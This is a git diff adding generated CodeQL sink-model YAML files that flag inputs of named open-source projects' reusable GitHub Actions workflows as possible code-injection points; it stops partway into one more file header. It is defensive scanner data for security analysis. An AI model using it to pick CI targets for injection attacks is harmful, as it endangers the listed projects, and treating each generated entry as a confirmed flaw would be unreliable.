--git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml new file mode 100644 index 00000000000..1a38d6b35ad --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_NAME", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml new file mode 100644 index 00000000000..339d7b1dd0a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "inputs.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml new file mode 100644 index 00000000000..ff0f83454c2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml 
@@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.config_file", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wamr_app_framework_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.runner", "code-injection", "generated"] + - 
["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.os", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml new file mode 100644 index 00000000000..c07d2aba0b6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.destination-tag", "code-injection", "generated"] + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml new file mode 100644 index 00000000000..77a7eaae309 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cemu-project/cemu/.github/workflows/build.yml", "*", "inputs.experimentalversion", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml new file mode 100644 index 00000000000..09299774b6a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml 
@@ -0,0 +1,29 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-engine-association", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-generator", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-platform", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-toolchain", "code-injection", 
"generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.extra-choco-packages", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.clang-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml new file mode 100644 index 00000000000..028210d4eac --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cgal/cgal/.github/workflows/send_email.yml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml new file mode 100644 index 00000000000..2ea83d9d94b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml new file mode 100644 index 00000000000..69f1b740c96 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.docker-context", "code-injection", "generated"] + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml new file mode 100644 index 00000000000..61af1d32441 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.scala", "code-injection", "generated"] + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml new file mode 100644 index 00000000000..1532fc723aa --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "inputs.set_latest", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml new file mode 100644 index 00000000000..f4a7cd26183 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml new file mode 100644 index 00000000000..119bfeaa796 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_sim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_nosim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml new file mode 100644 index 00000000000..10ea343b7aa --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml new file mode 100644 index 00000000000..6310b7155d3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.millargs", "code-injection", "generated"] + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml new file mode 100644 index 00000000000..a1de7e9a8f9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml 
@@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.upgrade-plan-name", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-upgrade-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-type", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-b-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-a-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test-entry-point", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-suite", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-file-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml new file mode 100644 index 00000000000..d6e334573e4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.latest", "code-injection", "generated"] + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml new file mode 100644 index 00000000000..eeff97a8aea --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "inputs.version", "code-injection", "generated"] + - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "inputs.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml new file mode 100644 index 00000000000..34ffd6788b1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.pr-number", "code-injection", "generated"] + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml new file mode 100644 index 00000000000..8ee00d47f79 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.tag_name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.all_platforms", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.num_shards", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml new file mode 100644 index 00000000000..40b35b5c873 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.mage-targets", "code-injection", "generated"] + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml new file mode 100644 index 00000000000..c02368b5d51 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.deploy_path", "code-injection", "generated"] + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml new file mode 100644 index 00000000000..61b3e84b29e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "inputs.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml new file mode 100644 index 00000000000..72e4a3eec65 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "inputs.ddtrace-version", "code-injection", "generated"] + - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml new file mode 100644 index 00000000000..5e875442771 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.run_id", "code-injection", "generated"] + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml new file mode 100644 index 00000000000..991743df7d2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml new file mode 100644 index 00000000000..780d95fab47 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml new file mode 100644 index 00000000000..cf69379583d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml new file mode 100644 index 00000000000..211fe546e28 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["decidim/decidim/.github/workflows/test_app.yml", "*", "inputs.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml new file mode 100644 index 00000000000..d59258ce992 
